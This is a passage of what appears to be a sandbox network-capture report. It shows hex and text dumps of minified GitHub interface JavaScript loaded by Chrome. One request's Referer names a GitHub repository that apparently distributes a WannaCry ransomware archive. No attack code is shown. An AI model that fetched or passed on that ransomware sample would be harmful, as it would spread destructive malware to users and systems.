                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 46 5c 2d 5d 7c 5c 5c 2e 29 2b 29 2f 67 3b 72 2e 70 72 6f 74 6f 74 79 70 65 2e 69 6e 64 65 78 65 73 2e 70 75 73 68 28 7b 6e 61 6d 65 3a 22 43 4c 41 53 53 22 2c 73 65 6c 65 63 74 6f 72 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 69 66 28 74 3d 65 2e 6d 61 74 63 68 28 61 29 29 72 65 74 75 72 6e 20 74 5b 30 5d 2e 73 6c 69 63 65 28 31 29 7d 2c 65 6c 65 6d 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 63 6c 61 73 73 4e 61 6d 65 3b 69 66 28 74 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 29 72 65 74 75 72 6e 20 74 2e 73 70 6c 69 74 28 2f 5c 73 2f 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 22 62 61 73 65 56 61 6c 22 69 6e 20 74 29 72 65 74 75 72 6e 20 74 2e 62 61 73 65
                                                                                      Data Ascii: F\-]|\\.)+)/g;r.prototype.indexes.push({name:"CLASS",selector:function(e){var t;if(t=e.match(a))return t[0].slice(1)},element:function(e){var t=e.className;if(t){if("string"==typeof t)return t.split(/\s/);if("object"==typeof t&&"baseVal"in t)return t.base
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 65 63 74 6f 72 73 2c 70 3d 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 4f 62 6a 65 63 74 73 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 29 7b 66 6f 72 28 72 3d 30 2c 70 5b 28 6e 3d 7b 69 64 3a 74 68 69 73 2e 75 69 64 2b 2b 2c 73 65 6c 65 63 74 6f 72 3a 65 2c 64 61 74 61 3a 74 7d 29 2e 69 64 5d 3d 6e 2c 63 3d 64 28 74 68 69 73 2e 69 6e 64 65 78 65 73 2c 65 29 3b 72 3c 63 2e 6c 65 6e 67 74 68 3b 72 2b 2b 29 73 3d 28 75 3d 63 5b 72 5d 29 2e 6b 65 79 2c 28 6c 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 3b 66 6f 72 28 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 69 3d 65 5b 6e 5d 2c 74 2e 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 28 69 29 29 72 65 74 75 72 6e 20 69 7d 28 68 2c 6f 3d 75
                                                                                      Data Ascii: ectors,p=this.selectorObjects;if("string"==typeof e){for(r=0,p[(n={id:this.uid++,selector:e,data:t}).id]=n,c=d(this.indexes,e);r<c.length;r++)s=(u=c[r]).key,(l=function(e,t){var n,r,i;for(n=0,r=e.length;n<r;n++)if(i=e[n],t.isPrototypeOf(i))return i}(h,o=u
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 66 2e 6c 65 6e 67 74 68 3b 74 3c 69 3b 74 2b 2b 29 69 66 28 61 3d 28 6c 3d 66 5b 74 5d 29 2e 65 6c 65 6d 65 6e 74 28 65 29 29 7b 66 6f 72 28 6e 3d 30 2c 6f 3d 61 2e 6c 65 6e 67 74 68 3b 6e 3c 6f 3b 6e 2b 2b 29 69 66 28 63 3d 6c 2e 6d 61 70 2e 67 65 74 28 61 5b 6e 5d 29 29 66 6f 72 28 72 3d 30 2c 73 3d 63 2e 6c 65 6e 67 74 68 3b 72 3c 73 3b 72 2b 2b 29 21 70 5b 64 3d 28 75 3d 63 5b 72 5d 29 2e 69 64 5d 26 26 74 68 69 73 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 28 65 2c 75 2e 73 65 6c 65 63 74 6f 72 29 26 26 28 70 5b 64 5d 3d 21 30 2c 6d 2e 70 75 73 68 28 75 29 29 7d 72 65 74 75 72 6e 20 6d 2e 73 6f 72 74 28 68 29 7d 3b 76 61 72 20 66 3d 7b 7d 2c 70 3d 7b 7d 2c 6d 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 67 3d 6e 65 77 20 57 65 61 6b 4d 61 70 2c 62 3d
                                                                                      Data Ascii: f.length;t<i;t++)if(a=(l=f[t]).element(e)){for(n=0,o=a.length;n<o;n++)if(c=l.map.get(a[n]))for(r=0,s=c.length;r<s;r++)!p[d=(u=c[r]).id]&&this.matchesSelector(e,u.selector)&&(p[d]=!0,m.push(u))}return m.sort(h)};var f={},p={},m=new WeakMap,g=new WeakMap,b=
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 45 2c 6f 29 29 2c 6c 2e 61 64 64 28 74 2c 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 54 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 33 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 33 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 33 5d 3a 7b 7d 2c 69 3d 21 21 72 2e 63 61 70 74 75 72 65 2c 6f 3d 69 3f 70 3a 66 2c 73 3d 6f 5b 65 5d 3b 73 26 26 28 73 2e 72 65 6d 6f 76 65 28 74 2c 6e 29 2c 73 2e 73 69 7a 65 7c 7c 28 64 65 6c 65 74 65 20 6f 5b 65 5d 2c 64 6f 63 75 6d 65 6e 74 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 65 2c 45 2c 69 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 4d 28 65 2c 74 2c 6e 29 7b 72 65 74 75 72 6e 20 65 2e 64 69
                                                                                      Data Ascii: t.addEventListener(e,E,o)),l.add(t,n)}function T(e,t,n){var r=arguments.length>3&&void 0!==arguments[3]?arguments[3]:{},i=!!r.capture,o=i?p:f,s=o[e];s&&(s.remove(t,n),s.size||(delete o[e],document.removeEventListener(e,E,i)))}function M(e,t,n){return e.di
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 65 28 22 6f 70 65 6e 22 2c 22 22 29 3b 6c 65 74 20 65 3d 6f 28 74 2c 21 30 29 3b 65 26 26 65 2e 66 6f 63 75 73 28 29 2c 72 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 41 72 72 6f 77 55 70 22 3a 7b 6c 26 26 21 74 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 6f 70 65 6e 22 29 26 26 74 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6f 70 65 6e 22 2c 22 22 29 3b 6c 65 74 20 65 3d 6f 28 74 2c 21 31 29 3b 65 26 26 65 2e 66 6f 63 75 73 28 29 2c 72 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 6e 22 3a 69 66 28 73 26 26 72 2e 63 74 72 6c 4b 65 79 29 7b 6c 65 74 20 65 3d 6f 28 74 2c 21 30 29 3b 65 26 26 65 2e 66 6f 63 75 73 28 29 2c 72 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28
                                                                                      Data Ascii: e("open","");let e=o(t,!0);e&&e.focus(),r.preventDefault()}break;case"ArrowUp":{l&&!t.hasAttribute("open")&&t.setAttribute("open","");let e=o(t,!1);e&&e.focus(),r.preventDefault()}break;case"n":if(s&&r.ctrlKey){let e=o(t,!0);e&&e.focus(),r.preventDefault(
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 29 3b 69 66 28 21 72 29 72 65 74 75 72 6e 3b 6c 65 74 20 6f 3d 65 2e 67 65 74 28 6e 29 3b 69 66 28 21 6f 7c 7c 6f 2e 6c 6f 61 64 65 64 29 72 65 74 75 72 6e 3b 6f 2e 6c 6f 61 64 65 64 3d 21 30 3b 6c 65 74 20 73 3d 6e 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 69 6e 63 6c 75 64 65 2d 66 72 61 67 6d 65 6e 74 22 29 3b 73 26 26 21 73 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 29 26 26 28 73 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 65 6e 64 22 2c 28 29 3d 3e 69 28 74 29 29 2c 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 72 29 29 7d 66 75 6e 63 74 69 6f 6e 20 69 28 65 29 7b 69 66 28 21 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 6f 70 65 6e 22 29
                                                                                      Data Ascii: tAttribute("src");if(!r)return;let o=e.get(n);if(!o||o.loaded)return;o.loaded=!0;let s=n.querySelector("include-fragment");s&&!s.hasAttribute("src")&&(s.addEventListener("loadend",()=>i(t)),s.setAttribute("src",r))}function i(e){if(!e.hasAttribute("open")
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 2d 74 65 78 74 22 29 3f 65 3a 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 5b 64 61 74 61 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 2d 74 65 78 74 5d 22 29 3b 72 65 74 75 72 6e 20 74 3f 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 65 6e 75 2d 62 75 74 74 6f 6e 2d 74 65 78 74 22 29 7c 7c 74 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3a 6e 75 6c 6c 7d 28 65 29 3b 69 66 28 72 29 6e 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3d 72 3b 65 6c 73 65 7b 6c 65 74 20 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 29 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 6c 65 74 20 74 3d 65 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 6d 65 6e 75 2d 62 75 74 74 6f
                                                                                      Data Ascii: hasAttribute("data-menu-button-text")?e:e.querySelector("[data-menu-button-text]");return t?t.getAttribute("data-menu-button-text")||t.textContent:null}(e);if(r)n.textContent=r;else{let t=function(e){if(!e)return null;let t=e.hasAttribute("data-menu-butto
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 65 61 66 3d 63 6c 61 73 73 20 4c 65 61 66 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 65 29 7b 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 3d 5b 5d 2c 74 68 69 73 2e 70 61 72 65 6e 74 3d 65 7d 64 65 6c 65 74 65 28 65 29 7b 6c 65 74 20 74 3d 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 2e 69 6e 64 65 78 4f 66 28 65 29 3b 72 65 74 75 72 6e 20 2d 31 21 3d 3d 74 26 26 28 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 3d 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 2e 73 6c 69 63 65 28 30 2c 74 29 2e 63 6f 6e 63 61 74 28 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 2e 73 6c 69 63 65 28 74 2b 31 29 29 2c 30 3d 3d 3d 74 68 69 73 2e 63 68 69 6c 64 72 65 6e 2e 6c 65 6e 67 74 68 26 26 74 68 69 73 2e 70 61 72 65 6e 74 2e 64 65 6c 65 74 65 28 74 68 69 73 29 2c 21 30 29 7d 61 64 64 28 65 29 7b 72 65 74
                                                                                      Data Ascii: eaf=class Leaf{constructor(e){this.children=[],this.parent=e}delete(e){let t=this.children.indexOf(e);return -1!==t&&(this.children=this.children.slice(0,t).concat(this.children.slice(t+1)),0===this.children.length&&this.parent.delete(this),!0)}add(e){ret
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 3a 22 55 22 2c 22 5c 75 30 32 43 36 22 3a 22 49 22 2c 22 5c 78 64 38 22 3a 22 4f 22 2c 22 5c 75 32 32 30 46 22 3a 22 50 22 2c 22 5c 75 32 30 31 44 22 3a 22 7b 22 2c 22 5c 75 32 30 31 39 22 3a 22 7d 22 2c 22 5c 78 62 62 22 3a 22 7c 22 2c 22 5c 78 65 35 22 3a 22 61 22 2c 22 5c 78 64 66 22 3a 22 73 22 2c 22 5c 75 32 32 30 32 22 3a 22 64 22 2c 22 5c 75 30 31 39 32 22 3a 22 66 22 2c 22 5c 78 61 39 22 3a 22 67 22 2c 22 5c 75 30 32 44 39 22 3a 22 68 22 2c 22 5c 75 32 32 30 36 22 3a 22 6a 22 2c 22 5c 75 30 32 44 41 22 3a 22 6b 22 2c 22 5c 78 61 63 22 3a 22 6c 22 2c 22 5c 75 32 30 32 36 22 3a 22 3b 22 2c 22 5c 78 65 36 22 3a 22 27 22 2c 22 5c 78 63 35 22 3a 22 41 22 2c 22 5c 78 63 64 22 3a 22 53 22 2c 22 5c 78 63 65 22 3a 22 44 22 2c 22 5c 78 63 66 22 3a 22 46
                                                                                      Data Ascii: ":"U","\u02C6":"I","\xd8":"O","\u220F":"P","\u201D":"{","\u2019":"}","\xbb":"|","\xe5":"a","\xdf":"s","\u2202":"d","\u0192":"f","\xa9":"g","\u02D9":"h","\u2206":"j","\u02DA":"k","\xac":"l","\u2026":";","\xe6":"'","\xc5":"A","\xcd":"S","\xce":"D","\xcf":"F


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      77192.168.2.1649782185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:26 UTC678OUTGET /assets/chunk-app_assets_modules_github_jump-to_ts-2641544048b8.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:26 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 17034
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Thu, 22 Feb 2024 16:53:08 GMT
                                                                                      ETag: 0x8DC33C6BF675D1A
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:26 GMT
                                                                                      Age: 2069263
                                                                                      X-Served-By: cache-iad-kcgs7200178-IAD, cache-lga21935-LGA
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 1288, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: c7707fae6399ffde0160d908179404ac969ca751
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 61 70 70 5f 61 73 73 65 74 73 5f 6d 6f 64 75 6c 65 73 5f 67 69 74 68 75 62 5f 6a 75 6d 70 2d 74 6f 5f 74 73 22 5d 2c 7b 32 31 39 38 39 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6c 65 74 20 6f 3b 6e 2e 72 28 74 29 2c 6e 2e 64 28 74 2c 7b 63 6c 65 61 72 53 75 67 67 65 73 74 69 6f 6e 73 43 61 63 68 65 3a 28 29 3d 3e 5f 2c 67 65 74 53 75 67 67 65 73 74 69 6f 6e 73 3a 28 29 3d 3e 48 7d 29 3b 76 61 72 20 61 3d 6e 28 31 37 34 29 3b 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 6e 65 77 20 55 52 4c 28 65 2c 77 69 6e 64 6f 77 2e 6c
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_jump-to_ts"],{21989:(e,t,n)=>{let o;n.r(t),n.d(t,{clearSuggestionsCache:()=>_,getSuggestions:()=>H});var a=n(174);function i(e,t){let n=new URL(e,window.l
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 78 2d 78 78 78 78 78 78 78 78 78 78 78 78 22 2e 72 65 70 6c 61 63 65 28 2f 5b 78 79 5d 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3d 31 36 2a 4d 61 74 68 2e 72 61 6e 64 6f 6d 28 29 7c 30 3b 72 65 74 75 72 6e 28 22 78 22 3d 3d 3d 65 3f 74 3a 33 26 74 7c 38 29 2e 74 6f 53 74 72 69 6e 67 28 31 36 29 7d 29 7d 29 2c 21 21 6e 26 26 28 28 30 2c 73 2e 71 50 29 28 60 6a 75 6d 70 2d 74 6f 2d 24 7b 65 7d 60 2c 63 29 2c 28 22 6d 65 6e 75 2d 64 65 61 63 74 69 76 61 74 69 6f 6e 22 3d 3d 3d 65 7c 7c 22 63 6c 69 63 6b 22 3d 3d 3d 65 7c 7c 22 73 65 61 72 63 68 22 3d 3d 3d 65 29 26 26 28 63 3d 7b 7d 29 2c 21 30 29 29 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 29 7b 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 63 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 64 28 65 29
                                                                                      Data Ascii: x-xxxxxxxxxxxx".replace(/[xy]/g,function(e){let t=16*Math.random()|0;return("x"===e?t:3&t|8).toString(16)})}),!!n&&((0,s.qP)(`jump-to-${e}`,c),("menu-deactivation"===e||"click"===e||"search"===e)&&(c={}),!0))}function f(e){Object.assign(c,e)}function d(e)
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 22 64 61 74 61 2d 6f 77 6e 65 72 2d 73 63 6f 70 65 64 2d 73 65 61 72 63 68 2d 75 72 6c 22 29 2c 61 3d 76 28 63 2c 6f 2c 69 28 65 7c 7c 22 22 2c 6f 29 2c 21 30 2c 21 30 29 3b 6e 3f 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 61 2c 63 29 7d 69 66 28 6f 29 7b 6c 65 74 20 65 3d 74 3f 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 75 6e 73 63 6f 70 65 64 2d 73 65 61 72 63 68 2d 75 72 6c 22 29 2c 61 3d 76 28 6c 7c 7c 6e 65 77 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 2c 6f 2c 69 28 65 7c 7c 22 22 2c 6f 29 2c 21 31 2c 21 31 29 3b 6e 3f 2e 72 65 70 6c 61 63 65 43 68 69 6c 64 28 61 2c 6c 7c 7c 6e 65 77 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 29 7b 6c 65 74 20 74 3d 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65
                                                                                      Data Ascii: "data-owner-scoped-search-url"),a=v(c,o,i(e||"",o),!0,!0);n?.replaceChild(a,c)}if(o){let e=t?.getAttribute("data-unscoped-search-url"),a=v(l||new HTMLElement,o,i(e||"",o),!1,!1);n?.replaceChild(a,l||new HTMLElement)}}function p(e){let t=document.querySele
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 6c 65 74 20 6e 3d 65 2e 76 61 6c 75 65 2e 74 72 69 6d 28 29 2c 6f 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 6c 65 74 20 6e 3d 28 30 2c 61 2e 24 74 29 28 74 29 3b 72 65 74 75 72 6e 20 65 2e 73 6f 72 74 28 28 65 2c 74 29 3d 3e 6e 28 74 2e 70 61 67 65 4b 65 79 29 2d 6e 28 65 2e 70 61 67 65 4b 65 79 29 29 7d 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 6c 65 74 20 6f 3d 74 2e 72 65 70 6c 61 63 65 28 2f 5c 73 2f 67 2c 22 22 29 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 2c 61 3d 65 2e 66 69 6c 74 65 72 28 65 3d 3e 65 2e 70 61 74 68 21 3d 3d 6e 29 3b 72 65 74 75 72 6e 20 6f 3f 28 30 2c 79 2e 57 29 28 61 2c 65 3d 3e 7b 6c 65 74 20 74 3d 65 2e 6e 61 6d 65 2c 6e 3d 28 30 2c 72 2e 45 57 29 28 74 2c 6f 29 3b 72 65 74 75 72 6e 20 6e 3e 30 3f 7b 73 63 6f 72 65
                                                                                      Data Ascii: let n=e.value.trim(),o=function(e,t){let n=(0,a.$t)(t);return e.sort((e,t)=>n(t.pageKey)-n(e.pageKey))}(function(e,t,n){let o=t.replace(/\s/g,"").toLowerCase(),a=e.filter(e=>e.path!==n);return o?(0,y.W)(a,e=>{let t=e.name,n=(0,r.EW)(t,o);return n>0?{score
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 3d 74 2e 6e 61 6d 65 2c 73 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 61 72 69 61 2d 6c 61 62 65 6c 22 2c 74 2e 6e 61 6d 65 29 29 2c 28 30 2c 72 2e 51 77 29 28 73 7c 7c 6e 65 77 20 45 6c 65 6d 65 6e 74 2c 6e 2e 72 65 70 6c 61 63 65 28 2f 5c 73 2f 67 2c 22 22 29 29 2c 74 2e 74 79 70 65 29 7b 63 61 73 65 22 54 65 61 6d 22 3a 7b 6c 65 74 20 65 3d 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 61 76 61 74 61 72 22 29 3b 65 26 26 28 65 2e 61 6c 74 3d 74 2e 6e 61 6d 65 2c 65 2e 73 72 63 3d 74 2e 61 76 61 74 61 72 55 72 6c 3f 74 2e 61 76 61 74 61 72 55 72 6c 3a 22 22 2c 65 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 64 2d 6e 6f 6e 65 22 29 29 3b 62 72 65 61 6b 7d 63 61 73 65
                                                                                      Data Ascii: =t.name,s.setAttribute("aria-label",t.name)),(0,r.Qw)(s||new Element,n.replace(/\s/g,"")),t.type){case"Team":{let e=a.querySelector(".js-jump-to-suggestion-avatar");e&&(e.alt=t.name,e.src=t.avatarUrl?t.avatarUrl:"",e.classList.remove("d-none"));break}case
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 73 22 69 6e 20 65 2e 64 61 74 61 29 72 65 74 75 72 6e 5b 5d 3b 6c 65 74 20 74 3d 31 2c 6e 3d 5b 5d 3b 66 6f 72 28 6c 65 74 20 6f 20 6f 66 20 65 2e 64 61 74 61 2e 73 75 67 67 65 73 74 69 6f 6e 73 2e 6e 6f 64 65 73 29 6e 75 6c 6c 21 3d 6f 26 26 28 6f 2e 72 61 6e 6b 3d 74 2b 2b 2c 6f 2e 70 61 67 65 4b 65 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6c 65 74 20 74 3b 6c 65 74 5b 6e 2c 6f 5d 3d 65 2e 6e 61 6d 65 2e 73 70 6c 69 74 28 22 2f 22 29 7c 7c 5b 5d 3b 73 77 69 74 63 68 28 65 2e 74 79 70 65 29 7b 63 61 73 65 22 50 72 6f 6a 65 63 74 22 3a 74 3d 28 30 2c 61 2e 76 74 29 28 65 2e 6f 77 6e 65 72 2e 6e 61 6d 65 2c 60 24 7b 65 2e 6e 75 6d 62 65 72 7d 60 29 3b 62 72 65 61 6b 3b 63 61 73 65 22 52 65 70 6f 73 69 74 6f 72 79 22 3a 74 3d 28 30 2c 61 2e 57 46 29 28 6e
                                                                                      Data Ascii: s"in e.data)return[];let t=1,n=[];for(let o of e.data.suggestions.nodes)null!=o&&(o.rank=t++,o.pageKey=function(e){let t;let[n,o]=e.name.split("/")||[];switch(e.type){case"Project":t=(0,a.vt)(e.owner.name,`${e.number}`);break;case"Repository":t=(0,a.WF)(n
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 2e 64 65 74 61 69 6c 2e 68 6f 74 6b 65 79 29 7b 63 61 73 65 22 45 6e 74 65 72 22 3a 69 66 28 74 29 6c 28 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 2d 70 61 74 68 22 29 29 3b 65 6c 73 65 7b 6c 65 74 20 74 3d 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 3b 28 30 2c 6b 2e 42 74 29 28 74 29 7d 62 72 65 61 6b 3b 63 61 73 65 22 45 73 63 61 70 65 22 3a 65 2e 63 75 72 72 65 6e 74 54 61 72 67 65 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 66 69 65 6c 64 22 29 2e 62 6c 75 72 28 29 2c 67 28 29 7d 7d 29 2c 28 30 2c 45 2e 6f 6e 29 28 22 6e 61 76 69 67 61 74 69 6f 6e 3a 66 6f 63 75 73 22 2c 22 2e 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 6f 72 6d
                                                                                      Data Ascii: .detail.hotkey){case"Enter":if(t)l(t.querySelector(".js-jump-to-suggestion-path"));else{let t=e.currentTarget;(0,k.Bt)(t)}break;case"Escape":e.currentTarget.querySelector(".js-jump-to-field").blur(),g()}}),(0,E.on)("navigation:focus",".js-site-search-form
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 73 65 61 72 63 68 2e 73 6c 69 63 65 28 31 29 29 3b 72 65 74 75 72 6e 20 6f 2e 67 65 74 28 22 71 22 29 26 26 6f 2e 73 65 74 28 22 71 22 2c 65 29 2c 6e 2e 73 65 61 72 63 68 3d 6f 2e 74 6f 53 74 72 69 6e 67 28 29 2c 6e 2e 74 6f 53 74 72 69 6e 67 28 29 7d 28 65 2e 76 61 6c 75 65 2e 74 72 69 6d 28 29 2c 74 2e 68 72 65 66 29 7d 6c 28 74 29 7d 29 2c 28 30 2c 45 2e 6f 6e 29 28 22 73 75 62 6d 69 74 22 2c 22 2e 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 6f 72 6d 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 66 69 65 6c 64 22 29 29 72 65 74 75 72 6e 3b 6c 65 74 20 74 3d 65 2e 74 61 72 67 65 74 3b 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 64
                                                                                      Data Ascii: search.slice(1));return o.get("q")&&o.set("q",e),n.search=o.toString(),n.toString()}(e.value.trim(),t.href)}l(t)}),(0,E.on)("submit",".js-site-search-form",function(e){if(!document.querySelector(".js-jump-to-field"))return;let t=e.target;t.getAttribute("d
                                                                                      2024-03-23 14:47:26 UTC1378INData Raw: 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 2d 6e 6f 2d 6d 6f 75 73 65 29 22 2c 7b 73 75 62 73 63 72 69 62 65 3a 65 3d 3e 28 30 2c 6f 2e 71 43 29 28 28 30 2c 6f 2e 52 42 29 28 65 2c 22 6d 6f 75 73 65 6f 76 65 72 22 2c 6a 29 2c 28 30 2c 6f 2e 52 42 29 28 65 2c 22 6d 6f 75 73 65 6f 76 65 72 22 2c 76 29 29 7d 29 3b 6c 65 74 20 68 3d 30 3b 66 75 6e 63 74 69 6f 6e 20 79 28 65 29 7b 69 66 28 65 2e 74 61 72 67 65 74 21 3d 3d 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 26 26 65 2e 74 61 72 67 65 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 48 54 4d 4c 45 6c 65 6d 65 6e 74 26 26 21 65 2e 74 61 72 67 65 74 2e 63 6c 61 73 73 4c 69 73 74 2e 63 6f 6e 74 61 69 6e 73 28 22 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 65 6e 61 62 6c 65 22 29 29 72 65 74 75 72 6e
